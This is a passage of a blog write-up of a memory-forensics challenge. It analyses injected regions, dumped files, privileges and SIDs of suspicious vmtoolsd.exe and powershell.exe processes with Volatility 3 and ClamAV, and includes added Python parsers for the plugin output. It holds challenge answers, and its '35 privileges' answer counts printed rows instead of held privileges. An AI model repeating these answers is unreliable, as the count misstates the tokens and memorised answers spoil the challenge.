/home/kali/CHALLENGES/TOTAL_RECALL_2024/pid.7164.vad.0x1b986d60000-0x1b986d91fff.dmp: OK
/home/kali/CHALLENGES/TOTAL_RECALL_2024/pid.7164.vad.0x1b987d90000-0x1b987dc1fff.dmp: OK
----------- SCAN SUMMARY -----------
Known viruses: 8679505
Engine version: 1.0.1
Scanned directories: 0
Scanned files: 3
Infected files: 0
Data scanned: 0.52 MB
Data read: 0.45 MB (ratio 1.16:1)
Time: 23.106 sec (0 m 23 s)
Start Date: 2023:11:24 11:43:10
End Date: 2023:11:24 11:43:33</span>
</pre></div></div><div><br /></div></div><div><div>Interesting! Nothing is marked as suspicious. </div><div>At this point, we should have identified that potential malware has been injected into one or more processes. </div><div><br /></div><div><b>Q:</b> What is the permission on the memory regions?</div><div><b>A:</b> PAGE_EXECUTE_READWRITE permissions</div><div><br /></div><div><b>Q:</b> How many memory regions were reported as having injected code, based on your suspicious PIDs?</div><div><b>A:</b> 3</div><div><br /></div><div><b>Q:</b> What is the size of the memory regions which contain the injected code?</div><div><b>A:</b> 204800 and 65536</div><div><br /></div><div>There are 3 memory regions, all with PAGE_EXECUTE_READWRITE permissions.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">ls pid.* -l
-rw------- 1 kali kali 65536 Nov 24 10:45 pid.4852.vad.0x7df4d16b0000-0x7df4d16bffff.dmp
-rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b986d60000-0x1b986d91fff.dmp
-rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b987d90000-0x1b987dc1fff.dmp</span>
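To tie the malfind table and the <code>ls -l</code> output together, here is a small parser, added for this write-up and not part of Volatility or the original post. It reads the malfind output shown above, counts the flagged regions per PID, computes each region's size from its inclusive start and end VPN (which is how the 204800 and 65536 byte sizes arise), records the hexdumped leading bytes, and checks that the files written by <code>--dump</code> have the size the VPNs predict. The sample text and the file-size table are constructed from the tables in this post; the region and hexdump regular expressions are my own reading of the plugin's text output.

```python
"""Summarise Volatility 3 windows.malfind output: count regions per PID, work
out each region's size from its start/end VPN, and cross-check that size
against the files --dump wrote.  Added example for this write-up, not
Volatility code; sample text and sizes below are constructed from the post."""
import re

# Constructed excerpt in the shape vol3 prints: banner, header, then per region
# one summary row, a hexdump of the first bytes and a disassembly line.
SAMPLE_MALFIND = """\
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process Start VPN End VPN Tag Protection CommitCharge PrivateMemory File output Hexdump Disasm
7164 vmtoolsd.exe 0x1b986d60000 0x1b986d91fff VadS PAGE_EXECUTE_READWRITE 50 1 Disabled
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
0x1b986d60000: add byte ptr [rax], al
7164 vmtoolsd.exe 0x1b987d90000 0x1b987dc1fff VadS PAGE_EXECUTE_READWRITE 50 1 Disabled
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
0x1b987d90000: add byte ptr [rax], al
4852 powershell.exe 0x7df4d16b0000 0x7df4d16bffff VadS PAGE_EXECUTE_READWRITE 1 1 Disabled
00 00 00 00 00 00 00 00 ........
78 0d 00 00 00 00 00 00 x.......
0c 00 00 00 49 c7 c2 00 ....I...
0x7df4d16b0000: add byte ptr [rax], al
"""

# Constructed: the sizes `ls -l` showed for the --dump output files in the post.
DUMPED_SIZES = {
    "pid.4852.vad.0x7df4d16b0000-0x7df4d16bffff.dmp": 65536,
    "pid.7164.vad.0x1b986d60000-0x1b986d91fff.dmp": 204800,
    "pid.7164.vad.0x1b987d90000-0x1b987dc1fff.dmp": 204800,
}

# One region summary row: PID, process, start VPN, end VPN, VAD tag, protection, ...
REGION_RE = re.compile(
    r"^(?P<pid>\d+)\s+(?P<proc>\S+)\s+(?P<start>0x[0-9a-f]+)\s+(?P<end>0x[0-9a-f]+)\s+"
    r"(?P<tag>\S+)\s+(?P<prot>PAGE_\w+)\s+(?P<commit>\d+)\s+(?P<private>\d+)",
    re.IGNORECASE,
)
# Leading "xx xx xx ..." byte pairs of a hexdump row (the ASCII column is ignored).
HEXDUMP_RE = re.compile(r"^((?:[0-9a-f]{2} ){1,16})", re.IGNORECASE)


def parse_malfind(text):
    """Return one dict per flagged region, with its hexdumped leading bytes attached."""
    regions = []
    for line in text.splitlines():
        m = REGION_RE.match(line)
        if m:
            start, end = int(m["start"], 16), int(m["end"], 16)
            regions.append({
                "pid": int(m["pid"]), "process": m["proc"],
                "start": start, "end": end,
                "size": end - start + 1,   # VPNs are inclusive, so +1 gives the byte length
                "tag": m["tag"], "protection": m["prot"],
                "private": m["private"] == "1",
                "bytes": bytearray(),
            })
        elif regions and not line.startswith("0x"):   # "0x...: add byte ptr" is the disassembly
            h = HEXDUMP_RE.match(line)
            if h:
                regions[-1]["bytes"] += bytes.fromhex(h.group(1))
    return regions


def triage(regions):
    """Attach the reasons a region deserves attention.  A zero-filled start does not
    clear a region: malfind shows only its first bytes, and the code may sit deeper."""
    out = []
    for r in regions:
        head = bytes(r["bytes"][:16])
        reasons = []
        if r["protection"] == "PAGE_EXECUTE_READWRITE":
            reasons.append("rwx")
        if r["tag"] == "VadS":
            reasons.append("no mapped file")
        if head.startswith(b"MZ"):
            reasons.append("PE header at region start")
        elif any(head):
            reasons.append("non-zero content at region start")
        out.append({**r, "reasons": reasons})
    return out


def count_by_pid(regions):
    """How many regions malfind flagged in each process."""
    counts = {}
    for r in regions:
        counts[r["pid"]] = counts.get(r["pid"], 0) + 1
    return counts


def expected_dump_name(r):
    """File name --dump used for a VAD region in the post: pid.<pid>.vad.<start>-<end>.dmp"""
    return f"pid.{r['pid']}.vad.{r['start']:#x}-{r['end']:#x}.dmp"


def check_dump_sizes(regions, sizes):
    """True per file when the dumped size equals the VAD size computed from the VPNs."""
    return {expected_dump_name(r): sizes.get(expected_dump_name(r)) == r["size"] for r in regions}


if __name__ == "__main__":
    found = triage(parse_malfind(SAMPLE_MALFIND))
    for r in found:
        print(f"{r['pid']:>5} {r['process']:<16} {r['start']:#x}-{r['end']:#x} "
              f"{r['size']:>7} bytes {r['protection']} {', '.join(r['reasons'])}")
    print("regions per PID:", count_by_pid(found))
    print("dump sizes match:", check_dump_sizes(found, DUMPED_SIZES))
```

On the real output, pipe <code>vol.py ... windows.malfind.Malfind</code> into a file and feed that file's text to <code>parse_malfind</code>. The size check is the useful part: if a dumped file is smaller than the VPN range predicts, note it before drawing conclusions from the file's content, and treat the two all-zero vmtoolsd.exe regions as still open questions rather than as cleared, since only the first bytes of each region are shown.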
</pre></div></div><div><br /></div></div><div><div>Since no concerns were raised, let's look at this from a different perspective and dump the files for these processes.</div><div><br /></div><div>First, create a directory for each process:</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">mkdir 7164
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ mkdir 4852</span>
</pre></div></div><div><br /></div></div><div><div>Taking a snapshot view of the extracted files:</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir 7164/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles.DumpFiles --pid 7164
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
ImageSectionObject 0xe78bf4c4b390 mfc140enu.dll file.0xe78bf4c4b390.0xe78bf4724af0.ImageSectionObject.mfc140enu.dll.img
DataSectionObject 0xe78bf448f8b0 oleaccrc.dll file.0xe78bf448f8b0.0xe78bf43a04f0.DataSectionObject.oleaccrc.dll.dat
DataSectionObject 0xe78bf352b300 cversions.2.db file.0xe78bf352b300.0xe78bf32f71f0.DataSectionObject.cversions.2.db.dat
DataSectionObject 0xe78bf352b300 cversions.2.db file.0xe78bf352b300.0xe78bf32f71f0.DataSectionObject.cversions.2.db.dat
DataSectionObject 0xe78bf5512d10 msxml3r.dll file.0xe78bf5512d10.0xe78bf4f4d0b0.DataSectionObject.msxml3r.dll.dat
DataSectionObject 0xe78bf2f8d770 crypt32.dll.mui file.0xe78bf2f8d770.0xe78bf2d3c570.DataSectionObject.crypt32.dll.mui.dat
DataSectionObject 0xe78bf3529a00 msxml6r.dll file.0xe78bf3529a00.0xe78bf3a0d360.DataSectionObject.msxml6r.dll.dat
..............
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles.DumpFiles --pid 4852 | more
Volatility 3 Framework 2.5.2 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf37c5b80 winnlsres.dll file.0xe78bf37c5b80.0xe78bf3a0d720.DataSectionObject.winnlsres.dll.dat
DataSectionObject 0xe78bf37c5ea0 winnlsres.dll.mui file.0xe78bf37c5ea0.0xe78bf3a0d0e0.DataSectionObject.winnlsres.dll.mui.dat
DataSectionObject 0xe78bf2f8d770 crypt32.dll.mui file.0xe78bf2f8d770.0xe78bf2d3c570.DataSectionObject.crypt32.dll.mui.dat
ImageSectionObject 0xe78bf3fe36a0 System.Numerics.dll file.0xe78bf3fe36a0.0xe78bf0fd2210.ImageSectionObject.System.Numerics.dll.img
ImageSectionObject 0xe78bf5523b60 Microsoft.PowerShell.PSReadLine.dll file.0xe78bf5523b60.0xe78bf2ed1d00.ImageSectionObject.Microsoft.PowerShe
ll.PSReadLine.dll.img
...........................</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>Run all of these files through ClamAV. But first ensure ClamAV is up-to-date.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span><span style="color: white;">└─$ sudo freshclam --show-progress
Thu Dec 14 10:13:04 2023 -> ClamAV update process started at Thu Dec 14 10:13:04 2023
Thu Dec 14 10:13:04 2023 -></span><b><span style="color: #fcff01;"> daily.cld database is up-to-date</span></b><span style="color: white;"> (version: 27123, sigs: 2048780, f-level: 90, builder: raynman)
Thu Dec 14 10:13:04 2023 -> main.cvd database is up-to-date (version: 62, sigs: 6647427, f-level: 90, builder: sigmgr)
Thu Dec 14 10:13:04 2023 -> bytecode.cvd database is up-to-date (version: 334, sigs: 91, f-level: 90, builder: anvilleg)</span></span>
</pre></div></div><div><br /></div></div><div>Now scan the files again.</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">clamscan 7164/* 4852/*
Loading: 18s, ETA: 0s [========================>] 8.68M/8.68M sigs
Compiling: 3s, ETA: 0s [========================>] 41/41 tasks</span>
</pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">....</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">----------- SCAN SUMMARY -----------
Known viruses: 8680656
Engine version: 1.0.3
Scanned directories: 0
Scanned files: 232
</span><b><span style="color: #fcff01;">Infected files: 0
</span></b><span style="color: white;">Data scanned: 263.46 MB
Data read: 297.22 MB (ratio 0.89:1)
Time: 246.675 sec (4 m 6 s)
Start Date: 2023:12:14 10:14:36
End Date: 2023:12:14 10:18:43</span></pre></div></div><div><br /></div></div><div>Well, isn't this depressing!! Nothing is being reported as suspicious. While depressing, it is not surprising: if we go back above, we see Microsoft Defender was the EDR product running at the time of this capture, and we could assume that if Defender had seen these files as malicious, it would have acted on them. At this point, because of the high suspicion, I would still take this device offline: while the security tools have not validated "maliciousness", I have enough evidence to make a decision. This device, <i>10.0.0.108</i>, and the neighboring devices at <i>10.0.0.101</i> and <i>10.0.0.110 </i>should be taken offline. The map previously seen in the network statistics section shows there are established connections with these hosts.</div><div><div><br /></div><div><b>Q:</b> What privileges is the VMWare process at PID <i>7164 </i>running with?</div><div><b>A:</b> Getting the privileges the vmtoolsd.exe process with PID <i>7164 </i>is running with: </div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.privileges.Privs --pid 7164</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process Value Privilege Attributes Description
7164 vmtoolsd.exe 2 SeCreateTokenPrivilege Create a token object
7164 vmtoolsd.exe 3 SeAssignPrimaryTokenPrivilege Replace a process-level token
7164 vmtoolsd.exe 4 SeLockMemoryPrivilege Lock pages in memory
7164 vmtoolsd.exe 5 SeIncreaseQuotaPrivilege Increase quotas
7164 vmtoolsd.exe 6 SeMachineAccountPrivilege Add workstations to the domain
7164 vmtoolsd.exe 7 SeTcbPrivilege Act as part of the operating system
7164 vmtoolsd.exe 8 SeSecurityPrivilege Manage auditing and security log
7164 vmtoolsd.exe 9 SeTakeOwnershipPrivilege Take ownership of files/objects
7164 vmtoolsd.exe 10 SeLoadDriverPrivilege Load and unload device drivers
7164 vmtoolsd.exe 11 SeSystemProfilePrivilege Profile system performance
7164 vmtoolsd.exe 12 SeSystemtimePrivilege Change the system time
7164 vmtoolsd.exe 13 SeProfileSingleProcessPrivilege Profile a single process
7164 vmtoolsd.exe 14 SeIncreaseBasePriorityPrivilege Increase scheduling priority
7164 vmtoolsd.exe 15 SeCreatePagefilePrivilege Create a pagefile
7164 vmtoolsd.exe 16 SeCreatePermanentPrivilege Create permanent shared objects
7164 vmtoolsd.exe 17 SeBackupPrivilege Backup files and directories
7164 vmtoolsd.exe 18 SeRestorePrivilege Restore files and directories
7164 vmtoolsd.exe 19 SeShutdownPrivilege Present Shut down the system
7164 vmtoolsd.exe 20 SeDebugPrivilege Debug programs
7164 vmtoolsd.exe 21 SeAuditPrivilege Generate security audits
7164 vmtoolsd.exe 22 SeSystemEnvironmentPrivilege Edit firmware environment values
7164 vmtoolsd.exe 23 SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories
7164 vmtoolsd.exe 24 SeRemoteShutdownPrivilege Force shutdown from a remote system
7164 vmtoolsd.exe 25 SeUndockPrivilege Present Remove computer from docking station
7164 vmtoolsd.exe 26 SeSyncAgentPrivilege Synch directory service data
7164 vmtoolsd.exe 27 SeEnableDelegationPrivilege Enable user accounts to be trusted for delegation
7164 vmtoolsd.exe 28 SeManageVolumePrivilege Manage the files on a volume
7164 vmtoolsd.exe 29 SeImpersonatePrivilege Impersonate a client after authentication
7164 vmtoolsd.exe 30 SeCreateGlobalPrivilege Default Create global objects
7164 vmtoolsd.exe 31 SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller
7164 vmtoolsd.exe 32 SeRelabelPrivilege Modify the mandatory integrity level of an object
7164 vmtoolsd.exe 33 SeIncreaseWorkingSetPrivilege Present Allocate more memory for user applications
7164 vmtoolsd.exe 34 SeTimeZonePrivilege Present Adjust the time zone of the computer's internal clock
7164 vmtoolsd.exe 35 SeCreateSymbolicLinkPrivilege Required to create a symbolic link
7164 vmtoolsd.exe 36 SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session.</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div><b>Q:</b> What privileges is the PowerShell process at <i>4852 </i>running with?</div><div><b>A:</b> Looking at the PowerShell process at <i>4852 </i>also:<br /><br /></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.privileges.Privs --pid 4852</span></b><span style="color: white;"> | sed '1,4d'
4852 powershell.exe 2 SeCreateTokenPrivilege Create a token object
4852 powershell.exe 3 SeAssignPrimaryTokenPrivilege Replace a process-level token
4852 powershell.exe 4 SeLockMemoryPrivilege Lock pages in memory
4852 powershell.exe 5 SeIncreaseQuotaPrivilege Present Increase quotas
4852 powershell.exe 6 SeMachineAccountPrivilege Add workstations to the domain
4852 powershell.exe 7 SeTcbPrivilege Act as part of the operating system
4852 powershell.exe 8 SeSecurityPrivilege Present Manage auditing and security log
4852 powershell.exe 9 SeTakeOwnershipPrivilege Present Take ownership of files/objects
4852 powershell.exe 10 SeLoadDriverPrivilege Present Load and unload device drivers
4852 powershell.exe 11 SeSystemProfilePrivilege Present Profile system performance
4852 powershell.exe 12 SeSystemtimePrivilege Present Change the system time
4852 powershell.exe 13 SeProfileSingleProcessPrivilege Present Profile a single process
4852 powershell.exe 14 SeIncreaseBasePriorityPrivilege Present Increase scheduling priority
4852 powershell.exe 15 SeCreatePagefilePrivilege Present Create a pagefile
4852 powershell.exe 16 SeCreatePermanentPrivilege Create permanent shared objects
4852 powershell.exe 17 SeBackupPrivilege Present Backup files and directories
4852 powershell.exe 18 SeRestorePrivilege Present Restore files and directories
4852 powershell.exe 19 SeShutdownPrivilege Present Shut down the system
4852 powershell.exe 20 SeDebugPrivilege Present,Enabled Debug programs
4852 powershell.exe 21 SeAuditPrivilege Generate security audits
4852 powershell.exe 22 SeSystemEnvironmentPrivilege Present Edit firmware environment values
4852 powershell.exe 23 SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories
4852 powershell.exe 24 SeRemoteShutdownPrivilege Present Force shutdown from a remote system
4852 powershell.exe 25 SeUndockPrivilege Present Remove computer from docking station
4852 powershell.exe 26 SeSyncAgentPrivilege Synch directory service data
4852 powershell.exe 27 SeEnableDelegationPrivilege Enable user accounts to be trusted for delegation
4852 powershell.exe 28 SeManageVolumePrivilege Present Manage the files on a volume
4852 powershell.exe 29 SeImpersonatePrivilege Present,Enabled,Default Impersonate a client after authentication
4852 powershell.exe 30 SeCreateGlobalPrivilege Present,Enabled,Default Create global objects
4852 powershell.exe 31 SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller
4852 powershell.exe 32 SeRelabelPrivilege Modify the mandatory integrity level of an object
4852 powershell.exe 33 SeIncreaseWorkingSetPrivilege Present Allocate more memory for user applications
4852 powershell.exe 34 SeTimeZonePrivilege Present Adjust the time zone of the computer's internal clock
4852 powershell.exe 35 SeCreateSymbolicLinkPrivilege Present Required to create a symbolic link
4852 powershell.exe 36 SeDelegateSessionUserImpersonatePrivilege Present Obtain an impersonation token for another user in the same session.</span>
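A check worth doing on the two privilege tables above, before counting rows: the Privs plugin prints a row for every privilege it knows how to name, and a row with an empty Attributes column is a privilege the token does not hold. Only rows marked "Present" are in the token, only "Enabled" ones are usable as the process stands, and "Default" marks those enabled when the token was built. Read that way, vmtoolsd.exe at 7164 holds the small set a standard user token gets, while powershell.exe at 4852 holds the elevated-administrator set with SeDebugPrivilege enabled, which is what makes it the more interesting of the two. The parser below, added for this write-up and not part of Volatility or the original post, summarises the output that way and flags high-impact privileges that are actually held; the sample text is a constructed excerpt of the two tables above, and the watch list is my own selection.

```python
"""Summarise Volatility 3 windows.privileges.Privs output per process, separating
rows merely printed from privileges actually Present or Enabled in the token.
Added example for this write-up, not Volatility code; the sample is a constructed
excerpt of the two tables in the post."""
import re

SAMPLE_PRIVS = """\
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process Value Privilege Attributes Description
7164 vmtoolsd.exe 2 SeCreateTokenPrivilege Create a token object
7164 vmtoolsd.exe 19 SeShutdownPrivilege Present Shut down the system
7164 vmtoolsd.exe 20 SeDebugPrivilege Debug programs
7164 vmtoolsd.exe 23 SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories
4852 powershell.exe 2 SeCreateTokenPrivilege Create a token object
4852 powershell.exe 17 SeBackupPrivilege Present Backup files and directories
4852 powershell.exe 20 SeDebugPrivilege Present,Enabled Debug programs
4852 powershell.exe 23 SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories
4852 powershell.exe 29 SeImpersonatePrivilege Present,Enabled,Default Impersonate a client after authentication
"""

# Privileges that give a process reach well beyond its own address space (my
# selection, not from the post); one of these being Present, and especially
# Enabled, in an already-suspicious process raises its priority in triage.
HIGH_IMPACT = {
    "SeDebugPrivilege", "SeTcbPrivilege", "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege", "SeCreateTokenPrivilege", "SeLoadDriverPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
}

# A row is: PID, process, value, privilege, optional comma-joined attributes, description.
ATTR = r"(?:Present|Enabled|Default)"
ROW_RE = re.compile(
    r"^(?P<pid>\d+)\s+(?P<proc>\S+)\s+(?P<value>\d+)\s+(?P<priv>Se\w+Privilege)"
    rf"(?:\s+(?P<attrs>{ATTR}(?:,{ATTR})*))?\s+(?P<desc>.*)$"
)


def parse_privs(text):
    """One dict per privilege row; banner, progress and header lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        attrs = set(m["attrs"].split(",")) if m["attrs"] else set()
        rows.append({
            "pid": int(m["pid"]), "process": m["proc"], "privilege": m["priv"],
            "present": "Present" in attrs, "enabled": "Enabled" in attrs,
            "default": "Default" in attrs,
        })
    return rows


def summarize(rows):
    """Per PID: rows printed (what `wc --lines` counts), rows in the token, rows enabled."""
    out = {}
    for r in rows:
        s = out.setdefault(r["pid"], {"process": r["process"], "listed": 0,
                                      "present": 0, "enabled": 0, "enabled_names": []})
        s["listed"] += 1
        s["present"] += r["present"]
        if r["enabled"]:
            s["enabled"] += 1
            s["enabled_names"].append(r["privilege"])
    return out


def flag_high_impact(rows, watch=HIGH_IMPACT):
    """(pid, privilege) pairs for watch-list privileges that are really in the token."""
    return sorted((r["pid"], r["privilege"]) for r in rows
                  if r["present"] and r["privilege"] in watch)


if __name__ == "__main__":
    parsed = parse_privs(SAMPLE_PRIVS)
    for pid, s in summarize(parsed).items():
        print(f"{pid} {s['process']}: listed={s['listed']} present={s['present']} "
              f"enabled={s['enabled']} {s['enabled_names']}")
    print("high-impact privileges held:", flag_high_impact(parsed))
```

Run it against the saved plugin output instead of the sample and compare the "present" count with the "listed" count: the latter is the 35 the post arrives at with <code>wc --lines</code>, the former is what the process can actually do.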
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> How many privileges are these two processes running with?</div><div><b>A:</b> The processes at PID 7164 and PID 4852 are both running with 35 privileges.</div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.privileges.Privs --pid 7164 | sed '1,4d' | wc --lines
35</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"><br /></span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.privileges.Privs --pid 4852 | sed '1,4d' | wc --lines
35</span></pre></div></div><div><br /></div></div></div><div><br /></div><div>Looking at the SIDs, the processes were running as follows.</div><div><br /></div><div><b>Q:</b> What SIDs is the VMware process at 7164 running with?</div><div><b>A: </b><i>vmtoolsd.exe </i>at 7164 is running with the following SIDs:</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.getsids.GetSIDs --pid 7164</span></b><span><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process SID Name
7164 vmtoolsd.exe S-1-5-21-1563833629-3224366856-3602044515-1001 securitynik
7164 vmtoolsd.exe S-1-5-21-1563833629-3224366856-3602044515-513 Domain Users
7164 vmtoolsd.exe S-1-1-0 Everyone
7164 vmtoolsd.exe S-1-5-114 Local Account (Member of Administrators)
7164 vmtoolsd.exe S-1-5-32-544 Administrators
7164 vmtoolsd.exe S-1-5-32-545 Users
7164 vmtoolsd.exe S-1-5-4 Interactive
7164 vmtoolsd.exe S-1-2-1 Console Logon (Users who are logged onto the physical console)
7164 vmtoolsd.exe S-1-5-11 Authenticated Users
7164 vmtoolsd.exe S-1-5-15 This Organization
7164 vmtoolsd.exe S-1-5-113 Local Account
7164 vmtoolsd.exe S-1-5-5-0-1032752 Logon Session
7164 vmtoolsd.exe S-1-2-0 Local (Users with the ability to log in locally)
7164 vmtoolsd.exe S-1-5-64-10 NTLM Authentication
</span><b><span style="color: #fcff01;">7164 vmtoolsd.exe S-1-16-8192 Medium Mandatory Level</span></b></span><b><span style="color: #fcff01;">
</span></b></pre></div></div><div><br /></div></div><div><div><b>Q:</b> What SIDs is the PowerShell process at 4852 running with?</div><div><b>A:</b> PowerShell at 4852 is running with the following SIDs</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.getsids.GetSIDs --pid 4852</span></b><span><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process SID Name
4852 powershell.exe S-1-5-21-1563833629-3224366856-3602044515-1001 securitynik
4852 powershell.exe S-1-5-21-1563833629-3224366856-3602044515-513 Domain Users
4852 powershell.exe S-1-1-0 Everyone
4852 powershell.exe S-1-5-114 Local Account (Member of Administrators)
4852 powershell.exe S-1-5-32-544 Administrators
4852 powershell.exe S-1-5-32-545 Users
4852 powershell.exe S-1-5-4 Interactive
4852 powershell.exe S-1-2-1 Console Logon (Users who are logged onto the physical console)
4852 powershell.exe S-1-5-11 Authenticated Users
4852 powershell.exe S-1-5-15 This Organization
4852 powershell.exe S-1-5-113 Local Account
4852 powershell.exe S-1-5-5-0-1032752 Logon Session
4852 powershell.exe S-1-2-0 Local (Users with the ability to log in locally)
4852 powershell.exe S-1-5-64-10 NTLM Authentication
